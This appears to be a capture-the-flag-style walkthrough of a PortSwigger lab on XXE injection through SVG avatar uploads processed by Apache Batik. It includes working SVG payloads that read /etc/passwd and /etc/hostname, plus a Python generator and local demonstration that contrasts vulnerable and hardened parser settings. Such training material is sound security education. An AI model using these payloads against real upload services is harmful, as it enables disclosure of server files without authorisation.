PortSwigger Lab: Exploiting XXE via image file upload | WalkThrough

Introduction

Hello everyone, in this post I am going to share my writeup of the PortSwigger lab "Exploiting XXE via image file upload". The comment section offers an avatar upload, and uploaded avatars are processed with an older version of the Apache Batik library that is vulnerable to XXE injection. We will use this vulnerability to read the contents of the /etc/hostname file and solve the lab.

Target

This lab lets users attach avatars to comments and uses the Apache Batik library to process avatar image files.

To solve the lab, upload an image that displays the contents of the /etc/hostname file after processing. Then use the "Submit solution" button to submit the value of the server hostname.

Detection

Every post has a comment section where we can upload an avatar. From the lab description we already know that the server processes avatars with the Apache Batik library.

After searching for vulnerabilities in the Apache Batik library I came across this article.

In that vulnerability the web application lets clients upload a Scalable Vector Graphics (SVG) document and receive it back rasterized as a JPG or PNG. Because SVG is an XML format, the routine that parses the document is potentially prone to XXE injection: a DOCTYPE in the uploaded file can declare an external entity whose SYSTEM identifier points at a local file, and if the parser resolves external entities the file contents are substituted wherever that entity is referenced. The standard fix is to configure the XML parser not to resolve external entities (or to upgrade to a Batik version that does this).

So make a file test.svg and paste in the payload given below:

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg>

Upload the file as the avatar on a comment, then right-click the avatar next to your comment and choose "View Image". The image comes back blank: the upload was accepted and rasterized, so the server parsed our SVG without complaint, but &xxe; sits directly inside <svg> rather than inside a <text> element, so nothing is drawn. To see whether the entity was actually resolved we have to put the reference somewhere the renderer will draw it.

Exploitation

Now replace the content of test.svg with this:

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<svg width="500px" height="100px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-family="Verdana" font-size="16" x="10" y="40">&xxe;</text>
</svg>

This time we can see that something is written, but it is too small to read.

After changing the width and height in the payload to 500px by 500px, let's upload it and view the image again.

/etc/passwd is now clearly visible.

Now let's read /etc/hostname: change the SYSTEM identifier in the entity declaration from file:///etc/passwd to file:///etc/hostname and upload the avatar again.

Submit the hostname to complete the lab.
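The detection and exploitation steps above, as an added example that is not part of the original post or of the lab's own code: a small Python script that builds the avatar payload for any file path and image size, then parses it with Python's standard-library xml.sax parser as a stand-in for the vulnerable rasterizer. With external general entity resolution switched on, the parser opens the SYSTEM identifier and the file contents land inside the <text> element, which is exactly what Batik then draws into the avatar; with it switched off (the hardened setting, and the Python default since 3.7.1) the entity is left unresolved and nothing is drawn. The temporary hostname file, its content web-server-01 and the parser choice are constructed for the example; nothing here is Batik's API.

```python
"""Added example (not from the PortSwigger lab or the original post).

Builds the SVG XXE payload used in the lab for an arbitrary file and shows,
with Python's stdlib xml.sax parser standing in for the vulnerable rasterizer,
why resolving external entities puts file contents into the rendered <text>.
"""
import io
import os
import pathlib
import tempfile
import xml.sax
import xml.sax.handler

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"


def build_svg_payload(target_url, width=500, height=500, font_size=16):
    """Return the avatar SVG from the lab, parameterised on the file to read.

    target_url is the SYSTEM identifier of the external entity, for example
    'file:///etc/hostname'. The &xxe; reference is placed inside a <text>
    element so the rasterizer draws whatever the entity resolves to.
    """
    if '"' in target_url:
        raise ValueError("a double quote cannot appear inside the quoted SYSTEM literal")
    return (
        '<?xml version="1.0" standalone="yes"?>'
        '<!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "{url}" > ]>'
        '<svg width="{w}px" height="{h}px" xmlns="{svg}" xmlns:xlink="{xlink}" version="1.1">'
        '<text font-family="Verdana" font-size="{fs}" x="10" y="40">&xxe;</text>'
        '</svg>'
    ).format(url=target_url, w=width, h=height, svg=SVG_NS, xlink=XLINK_NS, fs=font_size)


class _TextCollector(xml.sax.handler.ContentHandler):
    """Collects the character data that ends up inside <text> elements."""

    def __init__(self):
        super().__init__()
        self._in_text = False
        self.chunks = []

    def startElement(self, name, attrs):
        if name == "text":
            self._in_text = True

    def endElement(self, name):
        if name == "text":
            self._in_text = False

    def characters(self, content):
        if self._in_text:
            self.chunks.append(content)


def rendered_text(svg_document, resolve_external_entities):
    """Parse the SVG and return the text a renderer would draw.

    resolve_external_entities=True mimics the vulnerable Batik build: the
    parser opens the SYSTEM identifier and substitutes the file contents for
    &xxe;. False is the hardened setting (and the Python default since 3.7.1):
    the external entity is skipped and nothing is drawn.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges, resolve_external_entities)
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(svg_document.encode("utf-8")))
    return "".join(collector.chunks)


def demo_against_constructed_file():
    """Stand-in for the lab target: a constructed hostname file instead of /etc/hostname.

    Returns (text drawn by the vulnerable parser, text drawn by the hardened one).
    """
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write("web-server-01\n")  # constructed sample content, not a real host
        path = fh.name
    try:
        payload = build_svg_payload(pathlib.Path(path).as_uri())
        leaked = rendered_text(payload, resolve_external_entities=True)
        hardened = rendered_text(payload, resolve_external_entities=False)
    finally:
        os.unlink(path)
    return leaked.strip(), hardened.strip()


if __name__ == "__main__":
    leaked, hardened = demo_against_constructed_file()
    print("vulnerable parser draws:", repr(leaked))
    print("hardened parser draws:  ", repr(hardened))
    # For the lab itself, write build_svg_payload("file:///etc/hostname") to
    # test.svg and upload it as the comment avatar.
```

The local run only demonstrates the mechanism; against the lab you still upload the generated test.svg as an avatar and view the image, and the width, height and font size arguments are there because, as seen above, the leaked text is easy to miss in a small avatar.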

eJPT | eCPPT | DarkArmy CTF Player
WraithOP